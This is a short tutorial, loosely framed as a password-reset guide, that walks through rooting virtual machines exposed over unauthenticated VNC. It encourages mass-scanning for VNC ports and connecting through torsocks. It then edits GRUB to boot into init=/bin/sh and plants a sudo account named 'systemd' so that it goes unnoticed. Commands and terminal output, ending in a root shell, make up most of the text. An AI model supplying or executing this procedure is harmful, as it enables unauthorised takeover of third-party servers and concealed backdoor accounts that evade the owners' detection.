Rooting VNC Virtual Machines (or reseting forgotten pass for your own PC)
It is very easy to root a machine if you have access to the bootloader and can change it’s boot parameters.
In this tutorial I am going to show common flaw with virtual machines and exposed unauthenticated VNC access.
Let’s get rolling.
To begin with. all you need is a VNC client. Or other sort of hardware access.
I recommend using TigerVNC Viewer.
Typical ports for VNC are:
Go masscan those :*
Connecting to the VNC server
Using torsocks here because I really doubt you would do this on your own server XD
This is just to show what an attacker might be using.
torsocks vncviewer 18.104.22.168
At first glance it might look secure. As we have a login prompt and don’t know the credentials.
Rebooting the box
But don’t forget this VNC is hardware level.
We can just press
F8 key and click
While booting up keep spamming
ESC key until GRUB menu appears.
Changing boot parameters
e to open boot parameter editor and add these changes.
init=/bin/sh and also
panic=1 so it does not get stuck in case of kernel panic.
F10 to boot.
Creating a new user or changing the password for existing one.
sh: cannot set terminal process group (-1): Inappropriate ioctl for device sh: no job control in this shell sh-5.0# useradd -m -G sudo -s /bin/sh systemd sh-5.0# passwd systemd New password: Retype new password: passwd: password updated successfully sh-5.0# echo b > /proc/sysrq-trigger
Misleading username is a key to being unnoticed.
systemd is bloat anyway (No one really knows what it does)
Done. Now just login using your new credentials.
Debian GNU/Linux 10 blabla tty1 blabla login: systemd Password: Linux blabla 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. No directory, logging in with HOME=/ $ sudo sh [sudo] password for systemd: sh-5.0# id uid=0(root) gid=0(root) groups=0(root) sh-5.0# sh-5.0#